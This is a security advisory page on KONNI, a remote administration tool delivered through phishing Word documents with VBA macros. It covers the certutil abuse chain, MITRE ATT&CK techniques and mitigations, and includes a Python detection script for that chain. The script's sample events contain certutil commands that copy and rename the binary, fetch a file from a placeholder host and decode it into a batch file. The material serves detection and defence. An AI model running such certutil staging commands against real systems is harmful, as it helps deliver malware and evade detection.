
Phishing Emails Used to Deploy KONNI Malware

KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal data.

What is Konni Malware?

KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts.

The Cybersecurity and Infrastructure Security Agency (CISA) has observed cyber actors using emails containing a Microsoft Word document with malicious Visual Basic for Applications (VBA) macro code to deploy KONNI malware.


Technical Details

KONNI malware is often delivered via phishing emails as a Microsoft Word document with a malicious VBA macro code.

This malicious code can change the font color from light grey to black (to trick the user into clicking "Enable Content"), check whether the Windows operating system is a 32-bit or 64-bit version, and then construct and execute the command line that downloads additional files.

Once the VBA macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator. It also incorporates a built-in function to decode base64-encoded files. The Command Prompt silently copies certutil.exe into a temp directory and renames it to evade detection.

The cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.
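The chain above (Word spawning a shell, certutil.exe copied and renamed into a temp directory, then invoked with download and base64-decode switches) leaves a recognisable trace in process-creation telemetry. The following is an added detection example, not code from the CISA alert; it runs over a constructed list of Sysmon-style process events, and the field names (Image, OriginalFileName, ParentImage, CommandLine), paths and hostnames are assumptions chosen for illustration.

```python
"""Flag the certutil download-and-decode chain in process-creation events."""
import re

# Constructed sample events (not real telemetry); paths and URL are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"cmd /c copy C:\Windows\System32\certutil.exe %TEMP%\ct.exe"},
    {"Image": r"C:\Users\user\AppData\Local\Temp\ct.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"ct.exe -urlcache -split -f http://example.invalid/a.txt %TEMP%\a.txt"},
    {"Image": r"C:\Users\user\AppData\Local\Temp\ct.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"ct.exe -decode %TEMP%\a.txt %TEMP%\a.bat"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -verify cert.cer"},  # benign admin use, must not fire
]

OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")
SUSPICIOUS_FLAGS = re.compile(r"-(urlcache|decode|encode)\b", re.IGNORECASE)


def classify(event):
    """Return the list of finding labels for one process-creation event."""
    findings = []
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    # PE version metadata survives a rename, so match on OriginalFileName (assumed field).
    is_certutil = event.get("OriginalFileName", "").lower() == "certutil.exe"
    # Office spawning a shell is how the VBA macro starts the chain.
    if parent in OFFICE_APPS and image in ("cmd.exe", "powershell.exe"):
        findings.append("office_spawned_shell")
    # Renamed copy: metadata still says CertUtil.exe but the on-disk name does not.
    if is_certutil and image != "certutil.exe":
        findings.append("renamed_certutil")
    # Download / base64 decode switches on any certutil binary, renamed or not.
    if is_certutil and SUSPICIOUS_FLAGS.search(event["CommandLine"]):
        findings.append("certutil_download_or_decode")
    # A shell copying certutil.exe somewhere else is the staging step itself.
    if image == "cmd.exe" and re.search(r"copy\s+\S*certutil\.exe", event["CommandLine"], re.I):
        findings.append("certutil_copied")
    return findings


def scan(events):
    """Map event index -> findings, keeping only the events that fired."""
    return {i: f for i, ev in enumerate(events) if (f := classify(ev))}
```

Matching on the binary's original file name rather than its path is what catches the renamed copy; a rule keyed only on "certutil.exe" in the command line misses it.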


MITRE ATT&CK Techniques

According to MITRE, KONNI uses the ATT&CK techniques listed below:

Technique - Use

System Network Configuration Discovery - KONNI can collect the Internet Protocol address from the victim’s machine.

System Owner/User Discovery - KONNI can collect the username from the victim’s machine.

Masquerading: Match Legitimate Name or Location - KONNI creates a shortcut called Anti virus service.lnk in an apparent attempt to masquerade as a legitimate file.

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - KONNI has used File Transfer Protocol to exfiltrate reconnaissance data out.

Input Capture: Keylogging - KONNI has the capability to perform keylogging.


Mitigations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems:


Maintain up-to-date antivirus signatures and engines. See Protecting Against Malicious Code.

Keep operating system patches up to date. See Understanding Patches and Software Updates.

Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.

Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators’ group unless required.

Enforce a strong password policy. See Choosing and Protecting Passwords.

Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See Using Caution with Email Attachments.

Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.

Disable unnecessary services on agency workstations and servers.

Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.


Resources

d-hunter – A Look Into KONNI 2019 Campaign

MITRE ATT&CK – KONNI

MITRE ATT&CK for Enterprise


Copyright @SecurWires. Designed & Developed by MindScript.